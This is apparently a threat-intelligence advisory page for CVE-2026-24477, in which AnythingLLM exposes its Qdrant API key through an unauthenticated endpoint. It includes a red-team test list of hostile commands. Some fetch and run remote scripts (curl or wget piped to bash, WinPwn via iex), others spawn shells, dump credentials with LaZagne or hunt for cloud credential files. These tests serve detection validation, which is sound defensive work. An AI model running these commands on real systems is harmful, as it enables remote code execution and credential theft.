CVE-2026-24477
Overview
This vulnerability is an information exposure flaw caused by improper access control in the AnythingLLM application. Specifically, the Qdrant API key is disclosed in plaintext via an unauthenticated API endpoint. The affected component is the /api/setup-complete endpoint when AnythingLLM is configured to use Qdrant as the vector database with an API key prior to version 1.10.0.
Vulnerability Description
AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. If AnythingLLM prior to version 1.10.0 is configured to use Qdrant as the vector database with an API key, this QdrantApiKey could be exposed in plain text to unauthenticated users via the `/api/setup-complete` endpoint. Leakage of QdrantApiKey allows an unauthenticated attacker full read/write access to the Qdrant vector database instance used by AnythingLLM. Since Qdrant often stores the core knowledge base for RAG in AnythingLLM, this can lead to complete compromise of the semantic search / retrieval functionality and indirect leakage of confidential uploaded documents. Version 1.10.0 patches the issue.
Impact
An unauthenticated remote attacker can retrieve the Qdrant API key by accessing the /api/setup-complete endpoint, enabling full read and write operations on the Qdrant vector database instance. This access can lead to unauthorized modification or exfiltration of the semantic search data and confidential documents stored therein. No user interaction or credentials are required, and the attack can be performed over the network. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms the ease of exploitation without privileges or user interaction, elevating the risk to data confidentiality and integrity.
Solution
Upgrade AnythingLLM to version 1.10.0 or later, where the exposure of the Qdrant API key via the /api/setup-complete endpoint has been addressed. Refer to the Mintplex-Labs security advisory GHSA-gm94-qc2p-xcwf on GitHub for detailed patch instructions and verification steps. No additional workarounds are documented; applying the vendor patch is the recommended remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in AnythingLLM arises from improper handling of sensitive API keys, specifically the QdrantApiKey, which can be exposed through an unsecured endpoint. This flaw is particularly critical as it allows unauthenticated users to access the `/api/setup-complete` endpoint, where the API key is inadvertently revealed in plain text. The Qdrant vector database is integral to the application's functionality, serving as a repository for the core knowledge base used in retrieval-augmented generation (RAG). The exposure of the API key not only compromises the integrity of the database but also jeopardizes the confidentiality of any sensitive documents stored within it.
Attackers can exploit this vulnerability through a straightforward process of accessing the exposed endpoint. Once they obtain the QdrantApiKey, they gain full read and write access to the vector database. This access allows them to manipulate the stored data, potentially altering or deleting critical information. Furthermore, attackers could extract sensitive documents and knowledge bases, leading to significant data breaches. The exploitation of this vulnerability could occur in various scenarios, including automated scripts that continuously probe for unsecured endpoints or targeted attacks by malicious actors seeking to exploit specific organizations that utilize AnythingLLM.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely on AnythingLLM for managing sensitive data. The compromise of the Qdrant vector database could lead to the leakage of confidential information, resulting in reputational damage, regulatory penalties, and financial losses. Organizations may face lawsuits from affected parties, especially if sensitive personal or proprietary information is exposed. Additionally, the loss of trust from clients and stakeholders can have long-lasting effects on business operations and customer relationships. The severity of this vulnerability, underscored by its high CVSS score, highlights the urgent need for organizations to address such security flaws proactively.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, they must ensure that they are running the latest version of AnythingLLM, as version 1.10.0 addresses this specific issue. Regular software updates and patch management are essential to protect against known vulnerabilities. Additionally, organizations should conduct security audits and penetration testing to identify and remediate any exposed endpoints or misconfigurations. Employing robust authentication mechanisms for API access can further reduce the risk of unauthorized access. Monitoring and logging access attempts to sensitive endpoints can help detect potential exploitation attempts early, allowing for timely intervention.
In conclusion, the vulnerability associated with the improper exposure of the QdrantApiKey in AnythingLLM poses significant risks to organizations utilizing this application. The potential for unauthorized access to critical data and the subsequent impact on business operations necessitate a comprehensive approach to security. By prioritizing software updates, implementing strong authentication measures, and conducting regular security assessments, organizations can better protect themselves against the threats posed by this and similar vulnerabilities.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2026-24477, indicating increased adversary interest and potential reconnaissance efforts targeting vulnerable AnythingLLM deployments configured with Qdrant vector databases. This surge corresponds with the recent assignment of a high CVSS score and the emergence of a significant EPSS rating, underscoring a growing likelihood of exploitation attempts in operational environments. While no new exploit code or active campaigns have been confirmed, the upward trend in telemetry suggests that threat actors are actively probing for exposed QdrantApiKeys to gain unauthorized access. This development elevates the threat level from theoretical to imminent, emphasizing the urgency for defenders to reassess exposure and monitoring strategies around affected systems. The increased visibility of this vulnerability in attacker reconnaissance phases highlights its attractiveness as a vector for lateral movement and data compromise within organizations leveraging AnythingLLM, thereby amplifying its operational risk profile.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Mintplexlabs | Anythingllm | All |
cpe:2.3:a:mintplexlabs:anythingllm:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
2 eventsSighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-24477 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-gm94-qc2p-xcwf |